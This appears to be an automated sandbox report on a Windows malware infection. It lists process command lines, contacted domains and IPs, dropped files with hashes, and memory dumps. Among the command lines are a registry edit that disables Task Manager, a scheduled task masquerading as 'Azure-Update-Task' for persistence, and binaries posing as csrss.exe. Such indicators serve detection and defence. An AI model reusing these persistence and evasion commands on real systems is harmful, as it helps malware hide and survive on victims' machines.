C:\Windows\system32\cmd.exe /c ""C:\containerProviderhost\SSJnjC24t.bat" "

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\containerProviderhost\runtimenetSvc.exe

"C:\containerProviderhost/runtimenetSvc.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\FSRA6W5YHr.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\csrss.exe

"C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\csrss.exe"

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 3352 -ip 3352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3352 -s 436

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3352 -ip 3352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3352 -s 428

C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build3.exe

"C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 trad-einmyus.com udp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 70.174.106.193.in-addr.arpa udp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 brusuax.com udp
KR 211.119.84.112:80 brusuax.com tcp
US 8.8.8.8:53 112.84.119.211.in-addr.arpa udp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 api.2ip.ua udp
US 104.21.65.24:443 api.2ip.ua tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 24.65.21.104.in-addr.arpa udp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 104.21.65.24:443 api.2ip.ua tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
KR 211.119.84.112:80 brusuax.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 habrafa.com udp
AR 190.224.203.37:80 habrafa.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 37.203.224.190.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
AR 190.224.203.37:80 habrafa.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 m2reg.ulm.ac.id udp
ID 103.23.232.80:80 m2reg.ulm.ac.id tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
DE 142.132.224.223:9001 tcp
US 8.8.8.8:53 140.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 80.232.23.103.in-addr.arpa udp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 22.249.124.192.in-addr.arpa udp
DE 142.132.224.223:9001 142.132.224.223 tcp
DE 142.132.224.223:9001 142.132.224.223 tcp
US 8.8.8.8:53 223.224.132.142.in-addr.arpa udp
DE 142.132.224.223:9001 142.132.224.223 tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 mahta-netwotk.click udp
US 8.8.8.8:53 resergvearyinitiani.shop udp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 172.67.217.100:443 resergvearyinitiani.shop tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 technologyenterdo.shop udp
US 104.21.80.118:443 technologyenterdo.shop tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 lighterepisodeheighte.fun udp
US 8.8.8.8:53 problemregardybuiwo.fun udp
US 8.8.8.8:53 100.217.67.172.in-addr.arpa udp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 detectordiscusser.shop udp
US 172.67.195.126:443 detectordiscusser.shop tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 trypokemon.com udp
US 172.67.185.36:443 trypokemon.com tcp
US 8.8.8.8:53 edurestunningcrackyow.fun udp
US 8.8.8.8:53 pooreveningfuseor.pw udp
US 8.8.8.8:53 turkeyunlikelyofw.shop udp
US 104.21.76.253:443 turkeyunlikelyofw.shop tcp
US 8.8.8.8:53 loftproper.com udp
US 104.21.11.77:443 loftproper.com tcp
US 8.8.8.8:53 118.80.21.104.in-addr.arpa udp
US 8.8.8.8:53 126.195.67.172.in-addr.arpa udp
US 8.8.8.8:53 36.185.67.172.in-addr.arpa udp
US 8.8.8.8:53 associationokeo.shop udp
US 172.67.147.18:443 associationokeo.shop tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 253.76.21.104.in-addr.arpa udp
US 8.8.8.8:53 77.11.21.104.in-addr.arpa udp
US 8.8.8.8:53 18.147.67.172.in-addr.arpa udp
US 8.8.8.8:53 valowaves.com udp
US 172.67.192.62:443 valowaves.com tcp
US 8.8.8.8:53 udp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 lucasowen.com.tr udp
TR 185.50.70.125:443 lucasowen.com.tr tcp
US 8.8.8.8:53 125.70.50.185.in-addr.arpa udp
US 8.8.8.8:53 19ba1a44-f02e-4187-a0bc-55313d2895e2.uuid.createupdate.org udp
US 8.8.8.8:53 stun.sipgate.net udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 server15.createupdate.org udp
US 15.197.250.192:3478 stun.sipgate.net udp
US 162.159.133.233:443 cdn.discordapp.com tcp
BG 185.82.216.104:443 server15.createupdate.org tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 192.250.197.15.in-addr.arpa udp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 carsalessystem.com udp
US 172.67.221.71:443 carsalessystem.com tcp
NL 80.85.246.217:80 80.85.246.217 tcp
US 8.8.8.8:53 233.133.159.162.in-addr.arpa udp
US 8.8.8.8:53 104.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 71.221.67.172.in-addr.arpa udp
US 8.8.8.8:53 217.246.85.80.in-addr.arpa udp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 tcp
US 8.8.8.8:53 scandalbasketballoe.shop udp
US 172.67.198.240:443 scandalbasketballoe.shop tcp
US 104.21.80.118:443 technologyenterdo.shop tcp
US 8.8.8.8:53 lighterepisodeheighte.fun udp
US 8.8.8.8:53 problemregardybuiwo.fun udp
US 172.67.195.126:443 detectordiscusser.shop tcp
US 8.8.8.8:53 edurestunningcrackyow.fun udp
US 8.8.8.8:53 pooreveningfuseor.pw udp
US 104.21.76.253:443 turkeyunlikelyofw.shop tcp
US 8.8.8.8:53 240.198.67.172.in-addr.arpa udp
US 172.67.147.18:443 associationokeo.shop tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
NL 80.85.246.217:80 80.85.246.217 tcp
NL 80.85.246.217:80 80.85.246.217 tcp

Files

memory/4272-1-0x0000000002E50000-0x0000000002F50000-memory.dmp

memory/4272-2-0x0000000000400000-0x0000000002BE0000-memory.dmp

memory/4272-3-0x0000000002D70000-0x0000000002D7B000-memory.dmp

memory/3444-4-0x00000000022D0000-0x00000000022E6000-memory.dmp

memory/4272-5-0x0000000000400000-0x0000000002BE0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8491.bat

MD5 55cc761bf3429324e5a0095cab002113
SHA1 2cc1ef4542a4e92d4158ab3978425d517fafd16d
SHA256 d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a
SHA512 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155

C:\Users\Admin\AppData\Local\Temp\9B28.exe

MD5 3d196de47911047d26c003e31a878038
SHA1 c368e8a2dacb6c322064f7f2aeb0b3cbcb274cd9
SHA256 19b9c4e7ba38960b14cf6557c7b6b7989009f0a7e368f1936050d1606c4cfc4a
SHA512 30871d6b7a9d94a602f21a6f5325f017c735db491351b64d9044b497c0f2d1cd8f0988857a358f29e077047ab5800a6384a2aa2ab17a539c2092d8828e87581b

memory/4760-20-0x0000000003740000-0x00000000037DA000-memory.dmp

memory/4760-21-0x0000000003900000-0x0000000003A1B000-memory.dmp

memory/1364-22-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1364-24-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1364-25-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1364-26-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1364-38-0x0000000000400000-0x0000000000537000-memory.dmp

memory/5952-41-0x0000000001BC0000-0x0000000001C5E000-memory.dmp

memory/4116-44-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4116-45-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4116-46-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 61069f3e5ec893a06611f1e74f5193f9
SHA1 c7d77c232343d594a9b55274ee482edb9d879971
SHA256 63f54ad995160d65ece7dc146e050409d6f72bfceaaf28e4d7333fe2e619cec8
SHA512 5c972dc939629e86e564e692091935d1b2af8e80f8f9872c7edba8ac5272a845691c7a9cd6440b3fb7822fb864f05adcb706879c9c1d0f2f5a55222fb4b376c3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 1614610ded3e92091cb4a735cbd2b486
SHA1 a45cdac15521127de130232ee79a7e766576a4e3
SHA256 f069678a6146a5412e1d4ae7a11dc6a1cd1f63830790872e202d7aab14bd4303
SHA512 4a291fa54485381497065e10b2adc718420697ec243f8afda8fe44c354ab3bcbb81bc05eac5e4c36275d80861f0d39a7b0efe08c580d1995bb5ffed6ac28b04f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 610f387cecd6b98e4abcb72626ee7d13
SHA1 791f01f69d1e025c15660cc87c6a2d332c16d1c7
SHA256 dd9c87c9d210b8dcb6f9d2b897c11b0a480b955a0aeaf4bb9b661f1bdc0604d1
SHA512 97d58a6504e70c4ceb4f255c6327d076b8ffc017945a9a8474f1ece483a5326d572ef13d6e4e5ba6bc2dba4b9575f99085ca2af2dbabc375f6bf0e8bef554858

memory/4116-53-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4116-54-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4116-58-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4116-60-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4116-61-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe

MD5 c6d3d647baad8a5b93b81d2487f4f072
SHA1 e9c1105dc41f85d4f7e94d4e004f8427787c8802
SHA256 7754125653413cfca3bde887fb2a22f0cd5144ec447bb274c69b005861b70a0a
SHA512 55425dc95161e627e19e17f1bb910f958dade0c2b12da5eaad31159f0e2dc5217ff293c52f39d860d399807d5b4a814f1bb24376c58b40cc171d298282052049

memory/388-74-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/3500-73-0x0000000000400000-0x0000000000649000-memory.dmp

memory/388-76-0x00000000005E0000-0x0000000000616000-memory.dmp

memory/3500-78-0x0000000000400000-0x0000000000649000-memory.dmp

memory/3500-79-0x0000000000400000-0x0000000000649000-memory.dmp

C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build3.exe

MD5 41b883a061c95e9b9cb17d4ca50de770
SHA1 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad
SHA256 fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408
SHA512 cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

memory/4116-100-0x0000000000400000-0x0000000000537000-memory.dmp

memory/3500-103-0x0000000000400000-0x0000000000649000-memory.dmp

memory/4116-106-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DEC9.exe

MD5 3882d53bb4fa9b34225dcd65476dbfea
SHA1 749ec3be884d1026e55576ff382e5f8bb5a71cb8
SHA256 bb9806e7e371d593ebff525132d9e16107adaa58cd04b1b0fb37230366b64e98
SHA512 25927023a8c74ec7a22f2d8e0406400a92af2e951169621ca3af7191cc8250e02ef443b968a994210615df0907c82e5091be480305d8c5ea796a871912d5f922

C:\Users\Admin\AppData\Local\Temp\DEC9.exe

MD5 e7323dbd6ea98dfdaeb364570ac5f374
SHA1 7c9a750c958aa9ee8554a1bbd3e5d9c2ccd9ebab
SHA256 04513f58c810278c4fcb89a532fb8b3460cb010979257d30d6ceb5f4df06bab8
SHA512 183d7f064c6892f303753b92cec34822c50cbeec6171a54e937b07c5c08b3fe1a2920cebf782cbd7272d63ec52bd91a6363a68fc782b4417fcbd7e25257eeda9

memory/5420-111-0x0000000000C20000-0x0000000000C21000-memory.dmp

memory/5420-113-0x0000000000C50000-0x00000000014FF000-memory.dmp

memory/5420-115-0x0000000000C30000-0x0000000000C31000-memory.dmp

memory/5420-117-0x0000000000C30000-0x0000000000C31000-memory.dmp

memory/5420-116-0x0000000000C30000-0x0000000000C31000-memory.dmp

memory/5420-118-0x0000000000C30000-0x0000000000C31000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\EB1F.exe

MD5 b7865292d9c37de3f9306365814344cc
SHA1 b5f59e17c84a7ba0b2f60cd7da78e9d8e36c758e
SHA256 f9e8294aea84cf597ddbadd29e63a3f470e1a98da704a755d6cd3b936f0f726b
SHA512 f4dd38f1c0e718ea23e28bd8d6d4b97a70582518b669e143f9708fff33a6afdbc45d75841be7bca9bcc53f1e2b4502e3bba4420338963dee7642bf0e0a5ec1bd

memory/5420-128-0x0000000000C50000-0x00000000014FF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\EB1F.exe

MD5 466ecbc5ca2ad88dc3b4266a305c46a0
SHA1 b4bb744f6d7d1b40108e9b49b779fe5408dcf2e8
SHA256 ba43638566c64d2a62e3affda029e768ce1acdbf11dbe8951fde17f07281566c
SHA512 374da55d1efd703225618cc58c4a33191d8477d04dbea607fccb299115f6343b6450f3430e5484a6b527ab77cc342aab0d397ee87151d752d3e24734bff52a28

memory/528-129-0x0000000003A10000-0x0000000003E0B000-memory.dmp

memory/528-130-0x0000000003F10000-0x00000000047FB000-memory.dmp

memory/528-131-0x0000000000400000-0x0000000001E0D000-memory.dmp

memory/5644-132-0x0000000003110000-0x0000000003146000-memory.dmp

memory/5644-134-0x0000000005890000-0x0000000005EB8000-memory.dmp

memory/5644-133-0x0000000073130000-0x00000000738E0000-memory.dmp

memory/5644-136-0x00000000030C0000-0x00000000030D0000-memory.dmp

memory/5644-137-0x00000000030C0000-0x00000000030D0000-memory.dmp

memory/5644-138-0x0000000005820000-0x0000000005842000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rxjarbex.uw3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5644-149-0x00000000061E0000-0x0000000006246000-memory.dmp

memory/5644-144-0x0000000006000000-0x0000000006066000-memory.dmp

memory/5644-150-0x00000000063A0000-0x00000000066F4000-memory.dmp

memory/5644-152-0x0000000006710000-0x000000000675C000-memory.dmp

memory/5644-151-0x0000000006370000-0x000000000638E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\F88E.exe

MD5 f00fc30d862188dde528abbc6b596b1a
SHA1 64d0811a72ce0ed361a3420cd53e272ca76a7519
SHA256 6841a8d26ef03994c271eabe988a6d548345352fc7e944c07556c649439cb592
SHA512 ff8e37e9bb113eba4d8a27cb70a901606cdb079902addb8e395d4a8f9e4e7a56f43cd13a9d353b1758672c56cffd8aaa1d0d8560b666f7f1fc334964101cdcca

C:\Users\Admin\AppData\Local\Temp\F88E.exe

MD5 9dae0e68915238849a0fa9df128f3ab4
SHA1 a1d1654fdb9d045d91c9399af62a0c7609f0e2fb
SHA256 c0c87892ac16ddc0d66cceffe4cf574aa9d07516fb7e07bc32f4b80d542ee03b
SHA512 8b9330bbde4a9327b96b6fa1cfcab7f4b040b706ad75f99c4a248cc015dee1cffdb708d095f6eb94e2b13ea34fd58c4de7f47b35780abc201cd334ddd4c089d9

memory/5644-153-0x0000000006C30000-0x0000000006C74000-memory.dmp

memory/5644-158-0x0000000007800000-0x0000000007876000-memory.dmp

memory/5644-160-0x00000000078A0000-0x00000000078BA000-memory.dmp

memory/5644-159-0x0000000007F00000-0x000000000857A000-memory.dmp

memory/5644-162-0x0000000007C50000-0x0000000007C82000-memory.dmp

memory/5644-164-0x000000006FC30000-0x000000006FF84000-memory.dmp

memory/5644-176-0x0000000007CB0000-0x0000000007D53000-memory.dmp

memory/5644-177-0x0000000007DA0000-0x0000000007DAA000-memory.dmp

memory/5644-175-0x00000000030C0000-0x00000000030D0000-memory.dmp

memory/5644-174-0x0000000007C90000-0x0000000007CAE000-memory.dmp

memory/5644-163-0x000000006FAD0000-0x000000006FB1C000-memory.dmp

memory/5644-161-0x000000007F6D0000-0x000000007F6E0000-memory.dmp

memory/5644-178-0x0000000008580000-0x0000000008616000-memory.dmp

memory/5644-179-0x0000000007DB0000-0x0000000007DC1000-memory.dmp

memory/5644-180-0x0000000007DF0000-0x0000000007DFE000-memory.dmp

memory/5644-181-0x0000000007E10000-0x0000000007E24000-memory.dmp

memory/5644-182-0x0000000007E50000-0x0000000007E6A000-memory.dmp

memory/5644-183-0x0000000007E40000-0x0000000007E48000-memory.dmp

memory/5644-186-0x0000000073130000-0x00000000738E0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\EB1F.exe

MD5 56dac0c9a7abb2e3ff23131d40981cea
SHA1 cf8ef3fd440de49cd411569b3647e1b679d6daec
SHA256 fc869d43604b2a00ba8b7f372d9d7261bb6e6e72b4ad1f729f1cbcfd34d2b3df
SHA512 1202e19b14f519262680342a4acc15e1124370d9bf5b8d8d8024c195d323a6bcd580712143cdebbdf4a7a6e5ee3684796896a7845b711a9a3ee225147fc05b5e

memory/4696-189-0x0000000003B30000-0x0000000003F37000-memory.dmp

memory/528-190-0x0000000003A10000-0x0000000003E0B000-memory.dmp

memory/4696-191-0x0000000000400000-0x0000000001E0D000-memory.dmp

memory/2632-192-0x0000000073130000-0x00000000738E0000-memory.dmp

memory/528-193-0x0000000003F10000-0x00000000047FB000-memory.dmp

memory/2632-195-0x0000000005C20000-0x0000000005F74000-memory.dmp

memory/2632-194-0x0000000004D40000-0x0000000004D50000-memory.dmp

memory/2632-196-0x0000000004D40000-0x0000000004D50000-memory.dmp

memory/528-206-0x0000000000400000-0x0000000001E0D000-memory.dmp

memory/2632-207-0x000000007F6E0000-0x000000007F6F0000-memory.dmp

memory/2632-208-0x000000006FAD0000-0x000000006FB1C000-memory.dmp

memory/2632-209-0x000000006FE00000-0x0000000070154000-memory.dmp

memory/2632-220-0x0000000004D40000-0x0000000004D50000-memory.dmp

memory/2632-219-0x0000000007410000-0x00000000074B3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DBD.exe

MD5 a5aa54a5dc4ff7156be31f9d45974b72
SHA1 c832ab6f3cf67feede0736a0151c46a96146511b
SHA256 972a6f8ef6ae10efa416e366916df1502188c48c66cd72e6135965d94349d78f
SHA512 03010898fd05b97677e5c01cbaf0e74c5931f47672376e3075a0d47926bca1acd0011b4a8178344d4970a322548a4bb5c6a2fd9781209253af61c9f426efa3c6

C:\Users\Admin\AppData\Local\Temp\DBD.exe

MD5 30c8e825e7a455fa783bb3406d35ac43
SHA1 adc8ac816c6d79fc1d6362717a410364b0e94376
SHA256 4d9c4fe34f11890db331ecdd6cb2b4eef95eb63ef6734004c2ace6ba2706c040
SHA512 d4b9c459ceac01779387a6c00d1ac5edf0ca96955e56ef149a0933c624fa8db4e4f9bd2fcd2d72567eb9dd712fa8581900eab4ef7b57b1ea21b3a0c7cfd54cdd

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 d2d0070d6238f7bdd91b8d0b26e9b1a8
SHA1 b2a8934734dcbd5617407914dde85d016d5745d0
SHA256 e5757dbd9cf7c4d41fbd87d9a9b708d352109bb7d18645d09f24f71eef31d958
SHA512 5652b890033a85f9abc202d99b87fce115147c36e9ede148d1522231b72fd6d1405d5f6245088982c63d5e6b8d71f1115157438d8e54049c8df7c85d0570fa49

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 a22e9f55c7fad9fe3a587b8362ef4f27
SHA1 b5ff7c697a38969e115928302f64da8f412b7912
SHA256 52edbfd5f8e6bc0653bced5ae77af65b15459b8cb2f88cade21f6a7afe37d12c
SHA512 81c32ec149fa5b9c83ee57597ec1c9d24ca0b5a5b839b6cdf099b70dbbbe544a30ab9d320949506ee128d741909ab26a981bbba74bf8b637ae34a1a65b9a8f6d

C:\Windows\rss\csrss.exe

MD5 4e1f7c6af1652e7bc059064547f141bc
SHA1 94a97f8e05c08236da2b769d54bf33280178d3ed
SHA256 36fc1e92f1f3af429651720b8e7ea5eb1ca2e83c5c74e233543275c09b57eb20
SHA512 f30069ed3c482cc15d5f5be84ab2b1fda85e151c2312b90b6e9019dcd24e2930ca1a09b1a4ba2a2f910e0fad8cf2a7dfe3bf4f42a8d247609bae540bb233c652

C:\Windows\rss\csrss.exe

MD5 e0e7ec5e6d3d82af46d75eefabd40073
SHA1 8919251b8a6e42b886a4e87bb7c7e8bb6d2534e9
SHA256 ae361995ab8d3160af4dcbdc9f0733bbcab6685edf3948f10ec514f8d8844438
SHA512 19d3f33f7431830a2e11f861a8aa7645e25ffa15a8956d9dcbd81fe269ec55fe9f335a1636f5f70f259bc9b746e87536e2b1369b32baa3df76ab2957e4d08276

memory/5700-303-0x00007FF795150000-0x00007FF795DB2000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 6d0a02f17cf7de01d2c9a515cf9aadc7
SHA1 6315fed881ababf93995293d12c6af01898fdcb5
SHA256 ddbd55f95723a7fcc0b21024c075058d264c2f9e1aaa74e5b3a5838a212c4eb8
SHA512 651cb1afb3feaf862ac64690ca0bb408c5715cb21304ad77de5b61e9ea4d4e4a4b702b8317e3a0f72563a6c232c8bf519b12bfba3a32ae4a3869b5351fdf8632

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 6f3dccff57bc5aff185aca77e00ff5fb
SHA1 1ec7526e90893871da011486ab2528dc8b8f8fb0
SHA256 964c27c8bc8178dffba23c2ef4b46adf7d33f896948e28f2e5a8e4ff803ee44c
SHA512 18ea93f158eb1dcc9004d8e937febac614c7f9698f6f28b7e1dbdcce26f7100e7167a71a4f4692ce9409926c496297907186797a2dc938aebfa79fdfa6424231

memory/4696-344-0x0000000000400000-0x0000000001E0D000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 d800345005c3b4d0da179a1254e0673e
SHA1 7e9d19b17b69d2a1c71b602cfaa5224fbac7cfa9
SHA256 914ee6fd2ddafbefe9f02baba2569d4f47cb0cc6498ef56ff350729fccc30ab3
SHA512 8b4fa1a5de3458fc6a09461cdbbba2898c56947d06841e04acf051c29d7bb73e5376bd9f4fab9aa2561975bd180bae607597f09792e4e9600e735bc54fb85da5

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

memory/5700-395-0x00007FF795150000-0x00007FF795DB2000-memory.dmp

memory/4528-396-0x0000000000400000-0x0000000001E0D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5343.exe

MD5 f01f17070d6c361d7cf2fccacba7a82c
SHA1 a0b5ba4309eeb8039bb7ad8b4292118ff66c01dc
SHA256 21a1d9069914a274913301f71f4ddb4b991a16e13f99bbabeb6dc71c7ff8655a
SHA512 72858c907d1558befca030650b6d0abb6cc0eee7b67edd112f0fcbcb55283ae450de4777a8839993a214da1c4f78ba251ba3d6b2b7b02973347cff207601b49a

C:\Users\Admin\AppData\Local\Temp\5343.exe

MD5 769e796d195a615491199dcc178f39d7
SHA1 cd0f2a19ab3a01baa8b2da992d3f2902c60f16cc
SHA256 1edea0c154bc699abb18a119be5a97d4fed233b41e6bc14d2a6c8583a90089b8
